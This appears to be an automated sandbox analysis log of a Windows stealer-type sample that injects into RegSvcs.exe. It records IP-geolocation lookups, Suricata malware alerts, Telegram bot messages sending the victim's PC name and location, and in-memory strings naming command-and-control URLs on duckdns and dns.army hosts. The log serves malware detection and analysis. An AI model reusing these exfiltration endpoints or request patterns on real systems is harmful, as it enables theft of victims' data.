                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49845 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49807 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49794 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49851 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49841 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49893 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 104.21.32.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49833 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009522EE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:19:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:19:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000008.00000002.4592912814.0000000005B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20a
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000008.00000002.4584508040.00000000026E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
